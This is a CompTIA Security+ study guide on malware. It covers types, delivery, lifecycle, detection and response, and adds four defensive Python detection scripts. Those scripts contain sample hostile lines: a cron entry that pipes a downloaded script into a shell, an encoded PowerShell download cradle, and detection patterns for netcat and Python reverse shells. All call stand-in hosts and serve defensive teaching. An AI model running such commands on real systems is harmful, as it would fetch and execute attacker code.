
CompTIA Security+ – Section 6: Malware


Section 6: Malware Study Guide

1. Scope and Definition

Malware: Malicious software designed to disrupt, damage, or gain unauthorized access to systems, networks, or data. Includes viruses, worms, Trojans, ransomware, spyware, adware, rootkits, bots, logic bombs, etc.

Purpose of Study:

  • Understand precise definitions and distinguishing characteristics of malware types.
  • Recognize delivery vectors and infection methods.
  • Comprehend malware lifecycle and persistence mechanisms.
  • Know analysis, detection, and mitigation strategies.
  • Prepare to identify malware type, appropriate controls, and response steps in scenarios.

2. Classification of Malware

Classify malware by behavior, propagation, payload, and intent. Precise distinctions are critical.

2.1 By Form and Propagation Method

  • Virus: Self-replicating code that attaches to host files or programs; it spreads only when the infected host is executed or copied, so it depends on user or system action.
  • Worm: Standalone self-replicating code that propagates across networks autonomously, typically by exploiting unpatched vulnerabilities or weak credentials.
  • Trojan: Disguised as legitimate software; does not self-replicate but delivers its payload when the user executes it.
  • Bot / Botnet Agent: Infects the host and connects to command-and-control (C2) infrastructure to receive tasks (DDoS, spam, loading further malware).
  • Logic Bomb: Code that lies dormant until a specific condition, date or time triggers it.
  • Dropper / Downloader: First-stage malware; a dropper carries the main payload embedded inside itself, a downloader fetches it from attacker infrastructure after execution.
  • Ransomware: Encrypts or restricts access to data/systems and demands payment for restoration; many current operations also exfiltrate data first to add a second extortion threat.
  • Spyware / Adware: Covertly collects information (keystrokes, browsing, credentials) or displays unwanted advertisements.
  • Rootkit: Conceals malicious components (processes, files, registry keys, network connections) by subverting the OS at user, kernel or firmware level; it preserves and hides privileged access obtained by other means rather than gaining it.
  • Fileless Malware: Runs in memory and abuses legitimate tools (living off the land), leaving little or nothing on disk for file-based scanners.
  • Polymorphic and Metamorphic Malware: Alters its own code between infections to defeat signature matching; polymorphic malware encrypts or obfuscates a constant core and varies the decryptor, metamorphic malware rewrites its instructions so no constant core exists.
  • Advanced Persistent Threat (APT) Tools: Custom, stealthy malware used by well-resourced actors for long-term presence.

2.2 By Payload and Intent

  • Destructive Payload: Deletes or corrupts data (e.g., wipers).
  • Stealth/Spy Payload: Gathers credentials, keystrokes, screenshots.
  • Resource Abuse: Cryptojacking, botnet participation for DDoS.
  • Extortion: Ransomware encrypting files or denying service.
  • Backdoor Installation: Provides remote access for follow-up actions.
  • Credential Theft: Harvests credentials for lateral movement.
  • Reconnaissance: Gathers system or network information.
  • Evasion/Anti-Analysis: Techniques to detect or avoid sandbox/analysis environments.

3. Delivery Vectors and Infection Methods

Understanding delivery vectors informs prevention and detection strategies.

3.1 Common Delivery Vectors

  • Email Attachments / Phishing Links: Malware-laden attachments or links. Defense: email filtering, sandboxing, user training, disable macros.
  • Drive-by Downloads / Malicious Websites: Exploits in browsers/plugins. Defense: web filtering, patch management, browser isolation.
  • Removable Media: USB drives carrying malware. Defense: disable autorun, scan removable media.
  • Network Exploits: Worms exploiting unpatched vulnerabilities. Defense: patch management, segmentation, IPS.
  • Software Supply Chain: Compromised software or libraries. Defense: verify code integrity, secure build processes, vendor risk management.
  • Social Engineering / User Interaction: Trick user to execute malware. Defense: awareness training, application allowlisting.
  • Remote Desktop / RDP Exploitation: Brute-force or vulnerability-based delivery. Defense: limit exposure, MFA, monitor access.
  • Malicious Advertisements (Malvertising): Ads delivering exploits or redirects. Defense: ad-blocking, filtering, sandbox analysis.
  • Insider or Physical Access: Authorized individuals installing malware. Defense: strict access controls, activity monitoring, segregation of duties.
  • Fileless Techniques: Use of PowerShell, WMI, macros to execute in memory. Defense: application control, EDR behavior monitoring.

3.2 Infection Sequence

The sequence below follows the Cyber Kill Chain (weaponization sits between steps 1 and 2).

  1. Reconnaissance: Attacker identifies the target, its software and a viable vector.
  2. Delivery: Malware reaches the target via the chosen vector.
  3. Exploitation: Code executes via a vulnerability or user action.
  4. Installation: Persistent component or in-memory foothold established.
  5. Command and Control: Host communicates with attacker infrastructure.
  6. Actions on Objectives: Data theft, lateral movement, payload deployment, encryption, sabotage.
  7. Persistence and Evasion: Not a final step but a cross-cutting concern from installation onward (rootkits, fileless execution, obfuscation) that keeps the foothold through reboots and past detection.

4. Malware Analysis and Detection Techniques

Distinguish static, dynamic, memory, and network-based analysis; adopt a skeptical mindset.

4.1 Static Analysis

  • Definition: Examination without execution.
  • Techniques:
    • Signature-Based Detection: Known patterns/hashes; limited against unknown or obfuscated malware.
    • File Attribute Inspection: Metadata, PE headers, imports, packers.
    • Disassembly/Decompilation: Conceptual understanding of tools like IDA Pro, Ghidra.
    • YARA Rules: Pattern matching for malware families.
  • Precautions: Combine with dynamic analysis; static alone is insufficient.
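The static checks above (hashing for intelligence lookups, a `strings` pass, packer indicators and entropy as a packing hint) combined into one triage script. This is an added example for this study guide, not code from the guide or from any analysis tool; `SAMPLE` is a constructed byte string that only looks PE-like and is not an executable, and the indicator sets `INJECTION_APIS` and `PACKER_MARKERS` are illustrative assumptions rather than a vetted signature set.

```python
"""Static triage of a suspicious binary: hash, strings, entropy, indicator hits.

Added example for the study guide, not code from it or from any vendor tool.
SAMPLE is a constructed byte string, not an executable; the indicator lists
are illustrative assumptions.
"""
import hashlib
import math
import re
from collections import Counter

# Constructed sample: MZ header, a fake PE signature, UPX section names, a few
# process-injection API names and a URL embedded as NUL-separated ASCII strings.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
    + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00"
    + b"\x01\x02\x03" * 40
    + b"VirtualAllocEx\x00WriteProcessMemory\x00CreateRemoteThread\x00"
    + b"kernel32.dll\x00http://203.0.113.10/stage2.bin\x00"
    + b"\xff\xfe" * 20
)

# Assumed indicator lists for illustration only.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                  "NtUnmapViewOfSection", "SetWindowsHookExA"}
PACKER_MARKERS = {"UPX0", "UPX1", ".aspack", ".themida", ".vmp0"}


def sha256_hex(data: bytes) -> str:
    """Hash for threat-intel lookups; defeated by any repack, hence the other checks."""
    return hashlib.sha256(data).hexdigest()


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """ASCII-only equivalent of `strings -n <min_len>`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.decode("ascii") for m in pattern.findall(data)]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0..8. Packed or encrypted payloads sit near 7.5-8."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def triage(data: bytes) -> dict:
    """Combine the cheap static checks into one record an analyst can act on."""
    strings = extract_strings(data)
    return {
        "sha256": sha256_hex(data),
        "is_mz": data[:2] == b"MZ",
        "entropy": round(shannon_entropy(data), 2),
        "injection_apis": sorted(s for s in strings if s in INJECTION_APIS),
        "packer_markers": sorted(s for s in strings if s in PACKER_MARKERS),
        "urls": [s for s in strings if s.startswith(("http://", "https://"))],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key:16} {value}")
```

On a packed sample the strings pass finds almost nothing and the entropy climbs towards 8; that combination is itself the finding, and the next step is unpacking or dynamic analysis rather than trusting the empty string list. A real workflow would add PE header and import-table parsing (for example with the `pefile` library), which is omitted here to keep the script standard-library only.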

4.2 Dynamic Analysis (Behavioral / Sandbox)

  • Definition: Execute in controlled environment to observe behavior.
  • Techniques:
    • Sandbox Execution: Monitor file system, registry, network connections, processes.
    • Behavior Monitoring: API/system call tracking.
    • Network Traffic Analysis: Observe C2 communications, DNS queries.
  • Precautions: Malware may fingerprint the sandbox (VM artifacts, short uptime, no user activity, analysis tools) and withhold its payload or sleep past the run timeout, so a clean sandbox report is not proof of benign behaviour; such samples need a hardened sandbox or manual analysis.

4.3 Memory Analysis

  • Definition: Inspect memory dump for in-memory malware or rootkits.
  • Tools: Volatility for memory forensics.
  • Use Cases: Fileless malware detection, hidden processes.
  • Skeptical Note: Memory artifacts expose threats that leave no disk trace, but they are volatile; capture memory before rebooting or remediating the host, and expect the analysis to require expertise.

4.4 Network-Based Detection

  • Definition: Monitor traffic for malware indicators.
  • Techniques:
    • Signature-Based IDS/IPS: Known malicious patterns.
    • Anomaly-Based Detection: Unusual traffic patterns, beaconing.
    • DNS Monitoring: Suspicious domains, fast-flux detection.
    • TLS Inspection: Inspect encrypted traffic where permitted.
  • Limitations: Encrypted or obfuscated traffic may evade detection; integrate endpoint and threat intelligence.
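The anomaly-based detection of beaconing mentioned above, worked through on flow records: an implant that checks in on a near-fixed period with a near-fixed request size stands out from human browsing even when the traffic is encrypted, because the timing and size metadata are visible without TLS inspection. This is an added example for this study guide, not code from the guide or from any NDR product; `FLOWS` is a constructed flow log and the thresholds `min_events`, `max_cv` and `max_size_cv` are starting-point assumptions to tune against your own baseline.

```python
"""Beacon detection over flow records: periodic, low-jitter, fixed-size sessions.

Added example for the study guide, not code from it or from any product.
FLOWS is a constructed flow log (seconds since capture start, src, dst,
dport, bytes out); thresholds are assumptions to tune per environment.
"""
from collections import defaultdict
from statistics import mean, pstdev


def _series(start, src, dst, dport, intervals, sizes):
    """Expand a list of inter-arrival gaps into timestamped flow tuples."""
    t, out = start, []
    for gap, size in zip(intervals, sizes):
        t += gap
        out.append((t, src, dst, dport, size))
    return out


# Constructed sample: one implant checking in roughly every 60 s with small
# jitter and a near-constant request size, plus one user browsing a site at
# irregular times with varying sizes.
FLOWS = sorted(
    _series(0, "10.0.0.5", "203.0.113.10", 443,
            [60, 61, 59, 60, 62, 58, 60, 61, 59, 60],
            [412, 412, 412, 415, 412, 412, 412, 412, 413, 412])
    + _series(5, "10.0.0.7", "198.51.100.20", 443,
              [3, 45, 2, 1, 300, 7, 120, 0.5, 60, 15],
              [1200, 850, 9300, 300, 2200, 640, 4100, 700, 1500, 980])
)


def find_beacons(flows, min_events=8, max_cv=0.2, max_size_cv=0.1):
    """Flag (src, dst, dport) tuples whose connections recur on a near-fixed
    period with near-fixed size. cv = stdev / mean, so 0 is perfectly regular."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport, size in flows:
        by_pair[(src, dst, dport)].append((ts, size))

    hits = []
    for key, events in by_pair.items():
        if len(events) < min_events:
            continue
        events.sort()
        gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
        sizes = [s for _, s in events]
        gap_cv = pstdev(gaps) / mean(gaps) if mean(gaps) > 0 else float("inf")
        size_cv = pstdev(sizes) / mean(sizes)
        if gap_cv <= max_cv and size_cv <= max_size_cv:
            hits.append({"pair": key, "count": len(events),
                         "period_s": round(mean(gaps), 1),
                         "gap_cv": round(gap_cv, 3), "size_cv": round(size_cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(FLOWS):
        print(hit)
```

Two caveats a practitioner should keep in mind: implants that add large random jitter (tens of percent of the period) push `gap_cv` above a tight threshold, so longer observation windows and additional signals (fixed URI, constant TLS fingerprint, unusual destination reputation) are needed; and legitimate software such as update checkers and monitoring agents also beacons, so matches are leads to be allowlisted or investigated, not verdicts.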

4.5 Endpoint Detection and Response (EDR)

  • Definition: Agents capturing telemetry enabling rapid malware detection.
  • Capabilities:
    • Behavioral detection: Suspicious processes, persistence modifications.
    • Automated containment or quarantine.
    • Forensic data collection.
  • Note: Essential for detecting fileless and advanced threats.

4.6 Threat Intelligence Integration

  • Definition: Use IOCs and TTPs to inform detection and investigations.
  • Application: Block known malicious IPs/domains; correlate behavior with known campaigns; prioritize alerts.

5. Prevention and Mitigation Controls

Select controls aligned with malware types and vectors; maintain defense-in-depth.

5.1 Preventive Controls

  • Patch Management: Timely updates to close exploited vulnerabilities.
  • Application Allowlisting: Permit only approved executables and scripts.
  • Email/Web Filtering: Inspect attachments/URLs; sandbox suspicious content.
  • Endpoint Hardening: Disable unused services; restrict privileges; secure configurations.
  • User Training: Educate to recognize phishing; discourage risky actions.
  • Network Segmentation: Contain spread of malware.
  • Least Privilege: Limit user privileges to reduce impact.
  • Secure Development: Code signing and dependency vetting.
  • Device Control: Restrict removable media usage.
  • RASP (Runtime Application Self-Protection): Instruments the application to detect and block malicious behaviour at run time.

5.2 Detective Controls

  • Antivirus/Anti-malware: Signature and heuristic scanning; updated signatures; recognize limitations.
  • EDR/Endpoint Monitoring: Behavioral alerts; automated containment.
  • IDS/IPS: Network detection/blocking.
  • SIEM Correlation: Aggregate logs to detect infection patterns.
  • File Integrity Monitoring: Detect unauthorized changes.
  • UEBA: Detect anomalies indicating malware-driven actions.
  • Network Traffic Analysis: Monitor beaconing or unusual flows.

5.3 Corrective and Containment Controls

  • Quarantine/Isolation: Isolate infected hosts via EDR or network controls.
  • Patch/Remediate Vulnerabilities: Address vectors identified.
  • Malware Removal Tools: Updated anti-malware; manual removal with forensic guidance.
  • System Restoration: Restore from clean backups if damage irreversible.
  • Credential Reset: Reset compromised credentials.
  • Network Reconfiguration: Block malicious IPs/domains; adjust firewall rules.
  • Forensic Investigation: Memory and disk analysis to identify persistence mechanisms.
  • Post-Incident Hardening: Update controls based on root cause analysis.

5.4 Recovery and Lessons Learned

  • Backup and Recovery Strategy: Regular immutable backups; test restoration.
  • Incident Documentation: Record timeline, analysis, actions, residual risks.
  • Process Improvement: Update patch cadence, training, detection rules based on lessons.
  • Threat Intelligence Feedback Loop: Share indicators for proactive defense.

6. Malware Lifecycle and Persistence Techniques

Lifecycle stages and persistence mechanisms aid detection and removal.

6.1 Typical Malware Lifecycle

  1. Initial Access: Delivery and execution.
  2. Establish Foothold: Persistent or in-memory foothold established.
  3. Command and Control: Communication with attacker infrastructure.
  4. Lateral Movement: Spread or privilege escalation.
  5. Data Collection/Exfiltration: Gather/exfiltrate data.
  6. Maintenance and Evasion: Use rootkits, fileless techniques.
  7. Action on Objectives: Encryption, destruction, sabotage.
  8. Cleanup/Dormancy: Remove traces or dormancy for reactivation.

6.2 Common Persistence Mechanisms

  • Registry Run Keys
  • Scheduled Tasks / Cron Jobs
  • Services / Daemons
  • DLL Search-Order Hijacking / AppInit DLLs / Hooking (a legitimate process loads the attacker's DLL on every start; plain DLL injection is an execution technique and is not persistent by itself)
  • Bootkits / Rootkits
  • WMI-Based Persistence
  • Macro-Based Persistence
  • Startup Folders / Login Scripts
  • Hidden Files or NTFS Alternate Data Streams (ADS)
  • Firmware/BIOS Infection
  • Living-Off-The-Land Binaries (LOLBins such as mshta, regsvr32 or rundll32 invoked from the locations above, so no unsigned executable has to be written to disk)
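The Linux side of the persistence list above (cron jobs, systemd units, shell start-up files, `/etc/ld.so.preload` as a user-mode rootkit hook) audited offline by a script that walks those locations under a given root, so the same code works on a live host and on a mounted forensic image. This is an added example for this study guide, not code from the guide or from any forensic suite; the location list and the `SUSPICIOUS` patterns are illustrative assumptions that need tuning for your environment, and `build_fixture()` creates a constructed mock root so the script runs without real evidence.

```python
"""Offline audit of common Linux persistence locations under a mounted root.

Added example for the study guide, not code from it or from any forensic
suite. Paths and patterns are illustrative assumptions; build_fixture()
writes a constructed mock root for demonstration.
"""
import os
import re
import tempfile

# Relative to the audited root so the same code works on a mounted image.
CRON_PATHS = ["etc/crontab", "etc/cron.d", "var/spool/cron"]
UNIT_DIRS = ["etc/systemd/system", "usr/lib/systemd/system",
             "etc/systemd/user", "root/.config/systemd/user"]
SHELL_RC = ["etc/profile", "etc/bash.bashrc", "etc/rc.local",
            "root/.bashrc", "root/.profile"]
LD_SO_PRELOAD = "etc/ld.so.preload"

SUSPICIOUS = [
    r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b",       # download piped into a shell
    r"\bbase64\s+(-d|--decode)\b",                 # decode-and-run staging
    r"/(tmp|dev/shm|var/tmp)/\S+",                 # executables in world-writable dirs
    r"\bnc\b.*\s-e\s*/bin/(ba)?sh\b",              # netcat reverse shell
    r"python[23]?\s+-c\s+['\"]import\s+socket",    # inline Python reverse shell
]


def _read_text(path):
    try:
        with open(path, "r", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def _iter_files(root, rel):
    """Yield a single file, or every file beneath a directory."""
    path = os.path.join(root, rel)
    if os.path.isfile(path):
        yield path
    elif os.path.isdir(path):
        for dirpath, _dirs, names in os.walk(path):
            for name in names:
                yield os.path.join(dirpath, name)


def audit(root="/"):
    """Return findings as dicts with root-relative paths, one per matched line."""
    findings = []
    for rel in CRON_PATHS + UNIT_DIRS + SHELL_RC:
        for path in _iter_files(root, rel):
            for lineno, line in enumerate(_read_text(path).splitlines(), 1):
                for pat in SUSPICIOUS:
                    if re.search(pat, line):
                        findings.append({"path": os.path.relpath(path, root),
                                         "line": lineno, "pattern": pat,
                                         "text": line.strip()})
                        break
    # Every library listed here is loaded into every dynamically linked
    # process: a classic user-mode rootkit hook point, so report each entry.
    for lib in _read_text(os.path.join(root, LD_SO_PRELOAD)).split():
        findings.append({"path": LD_SO_PRELOAD, "line": 0,
                         "pattern": "ld.so.preload", "text": lib})
    return findings


def build_fixture():
    """Constructed mock root: a malicious cron job, a benign unit, a unit that
    launches from /dev/shm, a populated ld.so.preload and a clean .bashrc."""
    root = tempfile.mkdtemp(prefix="persist-audit-")
    files = {
        "etc/cron.d/sysupdate":
            "*/5 * * * * root curl -s http://203.0.113.10/x.sh | sh\n",
        "etc/systemd/system/backup.service":
            "[Service]\nExecStart=/usr/bin/backup --daily\n",
        "etc/systemd/system/dbus-helper.service":
            "[Service]\nExecStart=/bin/sh -c /dev/shm/.x/agent\n",
        "etc/ld.so.preload": "/usr/local/lib/libhook.so\n",
        "root/.bashrc": "alias ls='ls --color=auto'\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for f in audit(build_fixture()):
        print(f"{f['path']}:{f['line']}  {f['text']}")
```

Run `audit("/mnt/evidence")` against a read-only mount of the image rather than the live system where possible: a kernel-mode rootkit on the live host can hide exactly the files this script reads, which is why the same check from a known-good boot or from memory analysis is the confirmation step. Pattern hits are leads; a clean result only says these locations contain nothing matching these patterns.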

7. Common Indicators of Malware Infection

  • Performance Degradation
  • Unusual Network Traffic
  • Unexpected Files or Processes
  • Registry Changes
  • Alerts from Security Tools
  • Log Anomalies
  • User Complaints
  • System Crashes or Instability
  • Disabled Security Controls
  • Suspicious Persistence Artifacts

8. Analysis Tools and Environments

  • Static Analysis Tools: YARA, strings, PE inspection.
  • Sandbox Environments: Controlled VMs.
  • Network Monitoring Tools: Wireshark, Zeek (formerly Bro).
  • Memory Forensics Tools: Volatility.
  • Endpoint Forensics: File system, registry, event logs.
  • EDR Platforms
  • Threat Intelligence Platforms
  • Secure Lab Practices: Isolated, snapshot-capable environments.

9. Common Pitfalls and Misconceptions

  • Relying solely on signature-based detection.
  • Underestimating fileless or living-off-the-land techniques.
  • Assuming obvious symptoms indicate infection.
  • Neglecting network indicators.
  • Overlooking persistence artifacts.
  • Inadequate lab setup.
  • False confidence in automated sandboxes.
  • Ignoring user behavior.
  • Skipping post-incident lessons learned.
  • Misreading exam scenario clues.

10. Sample Scenario Mapping

10.1 Rapid Spread via Vulnerability

  • Description: Multiple hosts show identical unusual processes; exploit attempts observed.
  • Type: Worm.
  • Detection: IDS/IPS signatures, endpoint logs, memory forensics.
  • Response: Isolate hosts, patch systems, quarantine, strengthen patch management.

10.2 Email Macro Trojan

  • Description: User enables macros in malicious document; downloads payload.
  • Type: Trojan via macro.
  • Detection: Email logs, sandbox, EDR alerts on Office process behavior.
  • Response: Block macros from internet-sourced documents by policy, quarantine the host, update mail filters, train users.

10.3 Fileless Persistence via PowerShell

  • Description: Malware executes in memory via PowerShell; periodic beaconing.
  • Type: Fileless malware.
  • Detection: Monitor PowerShell logs, memory analysis, network beacon detection.
  • Response: Restrict PowerShell (Constrained Language Mode, script block logging, application control), use EDR, isolate the host, capture memory before remediation.
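Scenarios 10.2 and 10.3 (and the fileless vector in 3.1) share one detection opportunity: process-creation telemetry showing an Office process spawning a script host, and a PowerShell command line that hides its real content behind `-EncodedCommand`. The script below decodes that argument (base64 of UTF-16LE text) and scores each event against parent/child and download-cradle rules. This is an added example for this study guide, not code from the guide or from any EDR product; `EVENTS` is a constructed list shaped like Sysmon Event ID 1 / Windows 4688 fields, and the `OFFICE_PARENTS`, `SCRIPT_HOSTS` and `CRADLE_PATTERNS` sets are illustrative assumptions rather than a vendor rule set.

```python
"""Triage of process-creation telemetry for macro-launched and fileless PowerShell.

Added example for the study guide, not code from it or from any EDR.
EVENTS is constructed to resemble Sysmon Event ID 1 / Windows 4688 fields;
the parent/child pairs and keyword patterns are illustrative assumptions.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Download-cradle and stealth switches commonly seen in first-stage loaders.
CRADLE_PATTERNS = [
    r"Invoke-Expression|\bIEX\b",
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b",
    r"FromBase64String",
    r"-w(indowstyle)?\s+hidden",
    r"-nop\b|-noprofile\b",
    r"Net\.WebClient",
]
# -e, -ec, -enc and -EncodedCommand all select the same PowerShell switch.
ENC_SWITCH = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Attach human-readable reasons; the score is simply the number of reasons."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office parent {parent} spawned {image}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Match rules against the visible command line and the decoded payload.
    text = cmd if decoded is None else cmd + "\n" + decoded
    for pat in CRADLE_PATTERNS:
        if re.search(pat, text, re.I):
            reasons.append(f"matched /{pat}/")
    return {"pid": ev["ProcessId"], "decoded": decoded,
            "reasons": reasons, "score": len(reasons)}


# Constructed sample events. The encoded command is built here so the sample
# is reproducible; in a real log it appears as an opaque base64 blob.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_CRADLE.encode("utf-16le")).decode("ascii")
EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\a\Downloads\invoice.docm"'},
    {"ProcessId": 4388,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENC},
    {"ProcessId": 5012, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1"},
]


def triage(events):
    """Return scored events, highest score first, dropping zero-score noise."""
    scored = [score_event(e) for e in events]
    return sorted((s for s in scored if s["score"]), key=lambda s: -s["score"])


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit["pid"], hit["score"], hit["reasons"], hit["decoded"])
```

The decode step matters more than the keyword list: an analyst who only greps the raw command line never sees `DownloadString` because it sits inside the base64, and attackers layer further encoding (`FromBase64String`, compression) inside the decoded text, which is why PowerShell script block logging (Event 4104) that records the final de-obfuscated script is the stronger telemetry source on a live host.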

10.4 Ransomware Encryption Incident

  • Description: Data encrypted, ransom note displayed; backups compromised or outdated.
  • Type: Ransomware.
  • Detection: Endpoint logs, network C2 detection, backup verification.
  • Response: Isolate systems, restore from immutable backups, reset credentials, block C2, update backup strategy.

11. Exam Focus Points

  • Differentiate malware types (virus, worm, Trojan, ransomware, rootkit, fileless).
  • Identify delivery vectors in scenarios.
  • Understand lifecycle and persistence mechanisms.
  • Know detection methods: static, dynamic, memory, network-based.
  • Align controls to malware types and vectors.
  • Appreciate limitations of signature-based detection.
  • Recognize behavioral indicators and advanced techniques.
  • Interpret exam clues precisely for malware identification.
  • Emphasize preventive strategies: patching, allowlisting, training, segmentation.
  • Document response and recovery procedures, including backups and lessons learned.
  • Integrate threat intelligence for informed detection and response.

12. Revision and Study Techniques

  • Create classification tables and flashcards for malware characteristics and controls.
  • Practice scenario-based questions identifying malware type and response.
  • Review sandbox and EDR behavior concepts in a safe lab context.
  • Understand memory forensics role conceptually.
  • Review beaconing detection concepts for network analysis.
  • Examine incident response playbooks for malware incidents.
  • Use spaced repetition and formal documentation of study notes.
  • Perform Topic Audits on past errors related to malware topics.

13. Sample Topic Audit Entries

  • Distinguishing virus vs. worm: Flashcards and scenario practice to reinforce autonomy clue.
  • Fileless detection: Review EDR and behavior-based methods; scenario questions.
  • Persistence mechanisms: Review registry, scheduled tasks, LoLBins; identify in scenarios.
  • Ransomware backup strategy: Study offline/immutable backups; practice scenario-based planning.

14. Formal Tone Reminder

Document notes with precise terminology; treat study notes like formal incident reports: clear, evidence-based, action-oriented.

15. Dry Reality Check

“Malware evolves constantly; signature-based defenses alone are insufficient. Assume adversary employs stealth techniques. Train to spot subtle indicators, apply layered defenses, and verify eradication via forensic rigor. Superficial understanding will fail both exams and real operations.”

16. Next Steps

  • List misidentified malware topics for Topic Audit.
  • Create classification tables and flashcards.
  • Schedule focused study sessions with spaced repetition.
  • Practice scenario-based malware questions.
  • Review and validate until mastery; integrate into full mock exam preparation.

Use this guide to structure revision of Section 6: Malware. Maintain formal documentation and a skeptical, disciplined approach for deep understanding. Good luck.

